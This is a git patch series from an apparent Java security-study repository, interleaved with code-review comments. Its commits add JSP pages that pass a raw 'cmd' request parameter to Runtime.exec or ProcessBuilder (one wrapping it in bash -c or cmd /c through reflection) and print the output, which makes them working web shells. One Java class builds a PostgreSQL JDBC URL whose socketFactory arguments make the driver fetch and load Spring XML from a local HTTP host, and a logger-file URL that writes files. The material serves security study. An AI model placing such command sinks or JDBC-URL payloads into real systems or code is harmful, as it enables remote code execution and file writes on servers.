--- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java"
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ExecFailed.java"
@@ -1,4 +1,18 @@
 package com.test;
 
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.io.InputStream;
+
 public class ExecFailed {
+ public static void main(String[] args) throws IOException {
+ String origin = "echo 123";
+ String evil = "|echo 321";
+ String cmd = origin + evil;
+ InputStream inputStream = Runtime.getRuntime().exec(cmd).getInputStream();
+ System.out.printf(IOUtils.toString(inputStream));
+ // 123|echo 321
+ // 以空格分割,空格后全是参数,所以管道符没用
+ }
 }
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java"
index 79e2065..fde706a 100644
--- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java"
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/java/com/test/ProcessBuilderExec.java"
@@ -1,4 +1,11 @@
 package com.test;
 
+import java.io.IOException;
+
 public class ProcessBuilderExec {
+ public static void main(String[] args) throws IOException {
+ String[] cmd = {"cmd", "/c", "calc"};
+ ProcessBuilder processBuilder = new ProcessBuilder(cmd);
+ processBuilder.start();
+ }
 }
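Review bot: `System.out.printf(IOUtils.toString(inputStream))` in ExecFailed.main passes the command's output as the format string, so any `%` in that output throws `UnknownFormatConversionException`, and the single-argument `IOUtils.toString(InputStream)` decodes with the platform default charset; use `System.out.print(IOUtils.toString(inputStream, "UTF-8"))`. The tokenisation comment is correct but would be clearer in English and with the mechanism named: `// Runtime.exec(String) splits on whitespace with StringTokenizer and runs "echo" directly (no shell), so "123|echo" and "321" are just echo's arguments; a pipe only works when the program is a shell, e.g. sh -c / cmd /c`. The process is never waited on and the stream never closed; wrapping the stream in try-with-resources and calling `waitFor()` avoids leaking the child on repeated runs.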
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" index 42b0a1e..e4a8e64 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/processBuilder.jsp" @@ -1,16 +1,18 @@ -<%-- - Created by IntelliJ IDEA. - User: snowstorm-maxy - Date: 2025/9/30 - Time: 13:04 - To change this template use File | Settings | File Templates. ---%> +<%@ page import="java.io.InputStream" %> +<%@ page import="java.io.ByteArrayOutputStream" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> - - - $Title$ - - - $END$ - - +<% + // 漏洞触发点 + String cmd = request.getParameter("cmd"); + InputStream in = new ProcessBuilder(cmd).start().getInputStream(); + + ByteArrayOutputStream results = new ByteArrayOutputStream(); + + int l = -1; + byte[] b = new byte[1024]; + while ((l = in.read(b)) != -1) { + results.write(b, 0, l); + } + + out.println(results); +%> \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" index eb37888..3bf43c4 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime.jsp" 
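Review bot: `new ProcessBuilder(cmd)` with the raw parameter makes the whole string the program name, so `?cmd=whoami` works but `?cmd=ls -la` fails with a "No such file or directory" IOException, and a request without `cmd` passes null and throws NPE rather than a clear error — worth stating in the comment, e.g. `// single-arg ProcessBuilder: cmd must be a bare program name with no arguments; null when the parameter is absent`. Only stdout is read, so a command that writes a lot to stderr can block on a full pipe and error messages never appear; `redirectErrorStream(true)` on the builder before `start()` fixes both. Since the page is an intentional RCE sink (the 漏洞触发点 comment), a header comment saying it must never be deployed outside an isolated lab would keep it from being copied into something real.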
@@ -5,12 +5,26 @@ Time: 12:50 To change this template use File | Settings | File Templates. --%> +<%@ page import="java.io.BufferedReader" %> +<%@ page import="java.io.InputStreamReader" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> - - - $Title$ - - - $END$ - - +<% + // 漏洞触发点 + String cmd = request.getParameter("cmd"); + + BufferedReader in = new BufferedReader( + new InputStreamReader( + Runtime.getRuntime().exec(cmd).getInputStream(), + "UTF-8" + ) + ); + + String line; + StringBuilder results = new StringBuilder(); + while ((line = in.readLine()) != null) { + results.append(line); + } + in.close(); + + out.print(results); +%> diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" index 83d527d..ba1cffa 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/RceStudy/src/main/webapp/runtime2.jsp" 
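Review bot: `results.append(line)` in runtime.jsp concatenates output lines with no separator, so any multi-line command output (e.g. `ls`) renders as one run-together string; `results.append(line).append('\n')` and printing inside a `<pre>` keeps it readable. Only stdout is read and `getErrorStream()` is ignored, so a failing command shows an empty page and a chatty one can block on a full stderr pipe. `in.close()` is skipped if `readLine` throws; try-with-resources around the BufferedReader handles that. As with the other pages, this is an intentional RCE sink (漏洞触发点) and should carry a comment stating it must not be deployed outside an isolated lab.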
@@ -5,12 +5,50 @@ Time: 12:56 To change this template use File | Settings | File Templates. --%> +<%@ page import="java.lang.reflect.Constructor" %> +<%@ page import="java.lang.reflect.Method" %> +<%@ page import="java.io.InputStream" %> +<%@ page import="java.io.ByteArrayOutputStream" %> <%@ page contentType="text/html;charset=UTF-8" language="java" %> - - - $Title$ - - - $END$ - - +<% + // 漏洞触发点 + String c = request.getParameter("cmd"); + + // 根据系统自动调用对应命令 + String[] cmd; + String osName = System.getProperties().getProperty("os.name"); + if (osName.toLowerCase().contains("windows")) { + cmd = new String[]{"cmd", "/c", c}; + } else { + cmd = new String[]{"/bin/bash", "-c", c}; + } + + // 获取Runtime类对象 + Class runtimeClass = Class.forName("java.lang.Runtime"); + + // 获取构造方法 + Constructor runtimeConstructor = runtimeClass.getDeclaredConstructor(); + runtimeConstructor.setAccessible(true); + + // 创建Runtime类实例 相当于 Runtime r = new Runtime(); + Object runtimeInstance = runtimeConstructor.newInstance(); + + // 获取Runtime的exec(String cmd)方法 + Method runtimeMethod = runtimeClass.getMethod("exec", String[].class); + + // 调用exec方法 等于 r.exec(cmd); cmd参数输入要执行的命令 + Process p = (Process) runtimeMethod.invoke(runtimeInstance, new Object[]{cmd}); + + // 获取命令执行结果 + InputStream in = p.getInputStream(); + + ByteArrayOutputStream results = new ByteArrayOutputStream(); + byte[] b = new byte[1024]; + int l = -1; + + while ((l = in.read(b)) != -1) { + results.write(b, 0, l); + } + + out.print(results); +%> diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.gitignore" 
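Review bot: The non-Windows branch in runtime2.jsp hard-codes `/bin/bash`, which is absent on minimal images (Alpine-based or similar) that ship only `/bin/sh`, so the page fails there with a "No such file" IOException; `cmd = new String[]{"/bin/sh", "-c", c};` is the portable choice and is exactly what makes shell metacharacters work here, unlike the tokenised `Runtime.exec(String)` path. `p.getErrorStream()` is never read, so a failing command returns an empty body and can block on a full stderr pipe. `Method.invoke` wraps any IOException from exec in InvocationTargetException, which the bare page will surface as a 500 with the real cause nested — a short comment on the `invoke` line would save the next reader a debugging round. `out.print(results)` uses `ByteArrayOutputStream.toString()` with the platform charset; `results.toString("UTF-8")` matches the page's declared encoding.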
@@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" new file mode 100644 index 0000000..35410ca --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/.gitignore" @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/encodings.xml" @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" new file mode 100644 index 0000000..8345e46 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/misc.xml" @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file 
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" new file mode 100644 index 0000000..c2365ab --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/.idea/vcs.xml" @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" new file mode 100644 index 0000000..3737817 --- /dev/null +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/pom.xml" @@ -0,0 +1,25 @@ + + + 4.0.0 + + com.test + ReflectionStudy + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.apache.commons + commons-io + 1.3.2 + + + + \ No newline at end of file diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" index 0133f80..c54b471 100644 --- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" +++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/pojo/Baka.java" 
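Review bot: The dependency block of the new pom.xml appears (the element tags have been stripped in this rendering) to declare `org.apache.commons` / `commons-io` / `1.3.2`; that coordinate is a long-stale artifact, and the maintained line of the same library is published under the `commons-io` group id, so a newer release from there is the one to pin if the project is meant to build against current code. If the old coordinate is used deliberately for the study, a comment in the pom saying so would stop the next reader from "fixing" it.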
@@ -1,4 +1,62 @@
 package com.test.pojo;
 
 public class Baka {
+ public String name;
+ protected int gender;
+ private int age;
+
+ public Baka() {
+ System.out.println("Baka⑨");
+ }
+
+ public Baka(String name, int gender, int age) {
+ this.name = name;
+ this.gender = gender;
+ this.age = age;
+ System.out.println(name + " " + gender + " " + age);
+ }
+
+ public static void sit(String name) {
+ System.out.println("sit " + name);
+ }
+
+ public void hello(String name) {
+ System.out.println("hello " + name);
+ }
+
+ protected void hug(String name) {
+ System.out.println("hug " + name);
+ }
+
+ private void kiss(String name) {
+ System.out.println("kiss " + name);
+ }
+
+ private void kiss(String alias, String name) {
+ System.out.println("kiss " + alias + "(" + name + ")");
+ }
+
+ public String getName() {
+ return name;
+ }
+
+ public void setName(String name) {
+ this.name = name;
+ }
+
+ public int getGender() {
+ return gender;
+ }
+
+ public void setGender(int gender) {
+ this.gender = gender;
+ }
+
+ public int getAge() {
+ return age;
+ }
+
+ public void setAge(int age) {
+ this.age = age;
+ }
 }
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java"
index b09825a..2842be7 100644
--- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java"
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Reflection2Runtime.java"
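Review bot: `name` is declared `public` yet also gets `getName`/`setName`, while `gender` and `age` are `protected`/`private`; if the spread of access levels is intentional (the class reads as the target for the reflection exercises in ReflectionMethods), a class-level comment should say so, e.g. `/** Reflection target: fields, constructors and methods deliberately span public/protected/private. */`, otherwise `name` should be `private` like the others. Both constructors and every method print to `System.out` and return nothing, which is fine for a demo but worth one Javadoc line on the class so a reader does not go looking for return values.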
@@ -1,4 +1,21 @@
 package com.test.study;
 
+import org.apache.commons.io.IOUtils;
+
+import java.io.IOException;
+import java.io.InputStream;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.InvocationTargetException;
+
 public class Reflection2Runtime {
+ public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, IOException {
+ Class aClass = Class.forName("java.lang.Runtime");
+ Constructor declaredConstructor = aClass.getDeclaredConstructor();
+ declaredConstructor.setAccessible(true);
+ Runtime runtime = (Runtime) declaredConstructor.newInstance();
+ runtime.exec("calc");
+
+ InputStream inputStream = Runtime.getRuntime().exec("whoami").getInputStream();
+ System.out.println(IOUtils.toString(inputStream));
+ }
 }
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java"
index 8227c82..c0260d8 100644
--- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java"
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/ReflectionMethods.java"
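Review bot: `IOUtils.toString(inputStream)` in its single-argument form decodes with the platform default charset, and `inputStream` is never closed; `try (InputStream inputStream = Runtime.getRuntime().exec("whoami").getInputStream()) { System.out.println(IOUtils.toString(inputStream, "UTF-8")); }` fixes both. The `Process` returned by `runtime.exec("calc")` on the line before is discarded, so its streams are never drained or closed and the child is never waited on. `Class aClass` and `Constructor declaredConstructor` are raw types; `Class<?>` and `Constructor<?>` compile without unchecked warnings and make the `(Runtime)` cast on `newInstance()` visibly necessary.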
@@ -1,4 +1,84 @@
 package com.test.study;
 
+import com.test.pojo.Baka;
+
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
+
 public class ReflectionMethods {
+ public static void main(String[] args) throws Exception {
+ getField();
+ }
+
+ public static void getMethod() throws Exception {
+ Baka baka = new Baka();
+
+ Class aClass = Class.forName("com.test.pojo.Baka");
+ // 获取所有public方法,包括父类的
+ Method[] methods = aClass.getMethods();
+ for (Method method : methods) {
+ System.out.println(method.getName());
+ }
+
+ System.out.println("================================");
+
+ // 获取自己类的所有方法
+ Method[] declaredMethods = aClass.getDeclaredMethods();
+ for (Method method : declaredMethods) {
+ System.out.println(method.getName());
+ }
+
+ Method method = aClass.getDeclaredMethod("kiss", String.class);
+ // 临时设置私有方法可访问
+ method.setAccessible(true);
+ method.invoke(baka, "1diot9");
+
+ Method method1 = aClass.getDeclaredMethod("kiss", String.class, String.class);
+ method1.setAccessible(true);
+ method1.invoke(baka, "baka", "1diot9");
+
+ Method method2 = aClass.getMethod("sit", String.class);
+ // static方法可以不写obj参数
+ method2.invoke(null, "here");
+ }
+
+ public static void getConstructor() throws Exception {
+ Baka baka = new Baka();
+ Class aClass = Class.forName("com.test.pojo.Baka");
+ Constructor[] constructors = aClass.getConstructors();
+ for (Constructor constructor : constructors) {
+ System.out.println(constructor.getName());
+ }
+
+
+ Constructor constructor = aClass.getDeclaredConstructor(String.class, int.class, int.class);
+ constructor.setAccessible(true);
+ constructor.newInstance("1diot9", 0, 1);
+
+ Constructor constructor1 = aClass.getConstructor();
+ constructor1.setAccessible(true);
+ constructor1.newInstance();
+ }
+
+ public static void getField() throws Exception {
+ Baka baka = new Baka();
+ Class aClass = Class.forName("com.test.pojo.Baka");
+
Field[] fields = aClass.getDeclaredFields();
+ for (Field field : fields) {
+ System.out.println(field.getName());
+ }
+
+ baka.setName("1diot9");
+
+ Field field = aClass.getDeclaredField("name");
+ field.setAccessible(true);
+ // 反射修改字段
+ field.set(baka, "anything");
+ Object o = field.get(baka);
+ System.out.println(o);
+
+
+ }
 }
diff --git "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java" "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
index 66b6977..9f437d1 100644
--- "a/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
+++ "b/Java\345\237\272\347\241\200/Java\345\217\215\345\260\204/ReflectionStudy/src/main/java/com/test/study/Ways2Class.java"
@@ -1,4 +1,19 @@
 package com.test.study;
 
+import com.test.pojo.Baka;
+
 public class Ways2Class {
+ public static void main(String[] args) throws ClassNotFoundException {
+ Baka baka = new Baka();
+
+ Class aClass = baka.getClass();
+
+ Class aClass1 = Class.forName("com.test.pojo.Baka");
+
+ Class aClass2 = Baka.class;
+
+ System.out.println(aClass.equals(aClass1));
+ System.out.println(aClass.equals(aClass2));
+ System.out.println(aClass1.equals(aClass2));
+ }
 }
From 48772cf5e6e059a4a49eb1a402a7fc09ac430bcd Mon Sep 17 00:00:00 2001
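Review bot: `getConstructor()` creates `Baka baka = new Baka()` and never uses it, and `constructor1.setAccessible(true)` is redundant on a constructor obtained through `getConstructor()`, which only returns public ones; drop the unused local and the redundant call. `main` invokes only `getField()`, so `getMethod()` and `getConstructor()` are unreachable from the entry point — if each is meant to be run in turn, a comment such as `// swap the call below to exercise getMethod() / getConstructor()` makes that intent explicit. The `Class`, `Method[]`, `Constructor[]` and `Constructor` declarations are raw types; `Class<?>` and `Constructor<?>` compile without unchecked warnings. The `Field[] fields` line that opens this part of `getField()` is split across two lines in this rendering of the hunk.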
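Review bot: `java.lang.Class` does not override `equals`, so the three `aClass.equals(...)` calls in `Ways2Class.main` are identity comparisons; if the point of the demo is that all three routes yield the same loaded `Class` object, `aClass == aClass1` states that directly, and a comment like `// all three lookups resolve to the single Class instance loaded for Baka` would make the expected output obvious. The three locals are raw `Class`; `Class<?> aClass = baka.getClass();` (and likewise for `aClass1`, `aClass2`) compiles without warnings.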
From: 1diot9 <2868944833@qq.com> Date: Tue, 30 Sep 2025 13:26:30 +0800 Subject: [PATCH 03/16] =?UTF-8?q?=E6=9B=B4=E6=96=B0JDBC-PostgreSql?= =?UTF-8?q?=E5=88=A9=E7=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- JDBC/PostgreSql/.gitignore | 38 +++++++++++++++++++ JDBC/PostgreSql/.idea/.gitignore | 8 ++++ JDBC/PostgreSql/.idea/encodings.xml | 7 ++++ JDBC/PostgreSql/.idea/misc.xml | 14 +++++++ JDBC/PostgreSql/.idea/vcs.xml | 6 +++ JDBC/PostgreSql/log.txt | 10 +++++ JDBC/PostgreSql/pom.xml | 30 +++++++++++++++ JDBC/PostgreSql/src/main/java/Calc.java | 4 -- .../src/main/java/com/test/DirectConnect.java | 11 ++++++ JDBC/PostgreSql/src/main/java/tmp.java | 4 -- 10 files changed, 124 insertions(+), 8 deletions(-) create mode 100644 JDBC/PostgreSql/.gitignore create mode 100644 JDBC/PostgreSql/.idea/.gitignore create mode 100644 JDBC/PostgreSql/.idea/encodings.xml create mode 100644 JDBC/PostgreSql/.idea/misc.xml create mode 100644 JDBC/PostgreSql/.idea/vcs.xml create mode 100644 JDBC/PostgreSql/log.txt create mode 100644 JDBC/PostgreSql/pom.xml delete mode 100644 JDBC/PostgreSql/src/main/java/Calc.java delete mode 100644 JDBC/PostgreSql/src/main/java/tmp.java diff --git a/JDBC/PostgreSql/.gitignore b/JDBC/PostgreSql/.gitignore new file mode 100644 index 0000000..5ff6309 --- /dev/null +++ b/JDBC/PostgreSql/.gitignore @@ -0,0 +1,38 @@ +target/ +!.mvn/wrapper/maven-wrapper.jar +!**/src/main/**/target/ +!**/src/test/**/target/ + +### IntelliJ IDEA ### +.idea/modules.xml +.idea/jarRepositories.xml +.idea/compiler.xml +.idea/libraries/ +*.iws +*.iml +*.ipr + +### Eclipse ### +.apt_generated +.classpath +.factorypath +.project +.settings +.springBeans +.sts4-cache + +### NetBeans ### +/nbproject/private/ +/nbbuild/ +/dist/ +/nbdist/ +/.nb-gradle/ +build/ +!**/src/main/**/build/ +!**/src/test/**/build/ + +### VS Code ### +.vscode/ + +### Mac OS ### +.DS_Store \ No newline at end of file 
diff --git a/JDBC/PostgreSql/.idea/.gitignore b/JDBC/PostgreSql/.idea/.gitignore new file mode 100644 index 0000000..35410ca --- /dev/null +++ b/JDBC/PostgreSql/.idea/.gitignore @@ -0,0 +1,8 @@ +# 默认忽略的文件 +/shelf/ +/workspace.xml +# 基于编辑器的 HTTP 客户端请求 +/httpRequests/ +# Datasource local storage ignored files +/dataSources/ +/dataSources.local.xml diff --git a/JDBC/PostgreSql/.idea/encodings.xml b/JDBC/PostgreSql/.idea/encodings.xml new file mode 100644 index 0000000..aa00ffa --- /dev/null +++ b/JDBC/PostgreSql/.idea/encodings.xml @@ -0,0 +1,7 @@ + + + + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/.idea/misc.xml b/JDBC/PostgreSql/.idea/misc.xml new file mode 100644 index 0000000..d23f859 --- /dev/null +++ b/JDBC/PostgreSql/.idea/misc.xml @@ -0,0 +1,14 @@ + + + + + + + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/.idea/vcs.xml b/JDBC/PostgreSql/.idea/vcs.xml new file mode 100644 index 0000000..b2bdec2 --- /dev/null +++ b/JDBC/PostgreSql/.idea/vcs.xml @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/log.txt b/JDBC/PostgreSql/log.txt new file mode 100644 index 0000000..2d34e22 --- /dev/null +++ b/JDBC/PostgreSql/log.txt @@ -0,0 +1,10 @@ +九月 25, 2025 1:01:07 下午 org.postgresql.Driver connect +详细: Connecting with URL: jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection +详细: PostgreSQL JDBC Driver 42.3.0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setDefaultFetchSize +详细: setDefaultFetchSize = 0 +九月 25, 2025 1:11:13 下午 org.postgresql.jdbc.PgConnection setPrepareThreshold +详细: setPrepareThreshold = 5 +九月 25, 2025 1:11:18 下午 org.postgresql.core.v3.ConnectionFactoryImpl openConnectionImpl +详细: Trying to establish a protocol version 3 connection to FileWrite:5432 diff --git a/JDBC/PostgreSql/pom.xml b/JDBC/PostgreSql/pom.xml new file mode 100644 index 0000000..3ca70dd --- /dev/null +++ b/JDBC/PostgreSql/pom.xml 
@@ -0,0 +1,30 @@ + + + 4.0.0 + + com.test + PostgreSql + 1.0-SNAPSHOT + + + 8 + 8 + UTF-8 + + + + + org.springframework.boot + spring-boot-starter-web + 2.7.15 + + + org.postgresql + postgresql + 42.3.0 + + + + \ No newline at end of file diff --git a/JDBC/PostgreSql/src/main/java/Calc.java b/JDBC/PostgreSql/src/main/java/Calc.java deleted file mode 100644 index 457adbd..0000000 --- a/JDBC/PostgreSql/src/main/java/Calc.java +++ /dev/null @@ -1,4 +0,0 @@ -package PACKAGE_NAME; - -public class Calc { -} diff --git a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java index 2f55059..b197cc3 100644 --- a/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java +++ b/JDBC/PostgreSql/src/main/java/com/test/DirectConnect.java @@ -1,4 +1,15 @@ package com.test; +import org.postgresql.Driver; + +import java.sql.SQLException; + public class DirectConnect { + public static void main(String[] args) throws SQLException { + Driver driver = new Driver(); + String url = "jdbc:postgresql://127.0.0.1:1111/test/?socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&socketFactoryArg=http://127.0.0.1:7777/1.xml"; + String url1 = "jdbc:postgresql://127.0.0.1:7777/test/"; + String url2 = "jdbc:postgresql://FileWrite/?loggerLevel=DEBUG&loggerFile=log.txt"; + driver.connect(url, null); + } } diff --git a/JDBC/PostgreSql/src/main/java/tmp.java b/JDBC/PostgreSql/src/main/java/tmp.java deleted file mode 100644 index 9cd2166..0000000 --- a/JDBC/PostgreSql/src/main/java/tmp.java +++ /dev/null @@ -1,4 +0,0 @@ -package PACKAGE_NAME; - -public class tmp { -} From 31cbe949036cec5d3dc9585e2879a31075cf66e0 Mon Sep 17 00:00:00 2001 
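Review bot: In `DirectConnect.main`, `url1` and `url2` are assigned but never read, and the `Connection` returned by `driver.connect(url, null)` is discarded, so a successful connect is never closed; `try (Connection c = driver.connect(url, null)) { ... }` (with a `java.sql.Connection` import) handles that, and the two unused strings should be removed or kept as a comment if they document alternative cases. `Driver.connect` returns null for a URL the driver does not accept, so any code that later uses the result needs a null check. As written `main` produces no output at all, so there is no sign whether the connect completed or threw; printing the caught `SQLException` message or `c != null` would give the reader something to check against.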
From: 1diot9 <2868944833@qq.com> Date: Sun, 12 Oct 2025 14:21:36 +0800 Subject: [PATCH 04/16] =?UTF-8?q?doc:=20=E6=96=87=E6=A1=A3=E6=9B=B4?= =?UTF-8?q?=E6=96=B0?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../src/main/java/com/read/FileRead.java | 4 ++ CodeAudit/BasicVulStudy/FileWRD/test.txt | 0 JDBC/PostgreSql/ascii.jar | Bin 0 -> 1140 bytes JDBC/PostgreSql/origin.jar | Bin 0 -> 412 bytes .../main/java/com/test/StartApplication.java | 4 ++ .../src/main/java/com/test/UrlEncodeFile.java | 4 ++ .../com/test/controller/IndexController.java | 4 ++ .../src/main/java/com/test/exp/FileWrite.java | 4 ++ .../main/java/com/test/exp/SocketFactory.java | 4 ++ .../src/main/resources/application.yml | 0 JDBC/mysql/SpringTarget/pom.xml | 17 ++++++++ .../src/main/resources/application.yml | 0 JDBC/mysql/YsoserialGadgetGenerate.bin | Bin 0 -> 4060 bytes JDBC/mysql/cc5.pcap | Bin 0 -> 1822 bytes JDBC/mysql/final.pcap | 17 ++++++++ JDBC/mysql/hex.pcap | Bin 0 -> 5188 bytes JDBC/mysql/hex1.pcap | Bin 0 -> 4060 bytes JDBC/mysql/mysql.pcap | Bin 0 -> 1822 bytes JDBC/mysql/no-outbound/pom.xml | 17 ++++++++ .../no-outbound/src/main/java/exp/Exp.java | 4 ++ PyCharm/JDBC/Mysql/convert.py | 0 PyCharm/JDBC/Mysql/fakeServer.py | 0 PyCharm/JDBC/Mysql/fakeServerM4x.py | 0 PyCharm/JDBC/Mysql/hex.txt | 0 README.md | 38 +++++++++--------- 25 files changed, 97 insertions(+), 20 deletions(-) create mode 100644 CodeAudit/BasicVulStudy/FileWRD/src/main/java/com/read/FileRead.java create mode 100644 CodeAudit/BasicVulStudy/FileWRD/test.txt create mode 100644 JDBC/PostgreSql/ascii.jar create mode 100644 JDBC/PostgreSql/origin.jar create mode 100644 JDBC/PostgreSql/src/main/java/com/test/StartApplication.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/UrlEncodeFile.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/controller/IndexController.java create mode 100644 JDBC/PostgreSql/src/main/java/com/test/exp/FileWrite.java 
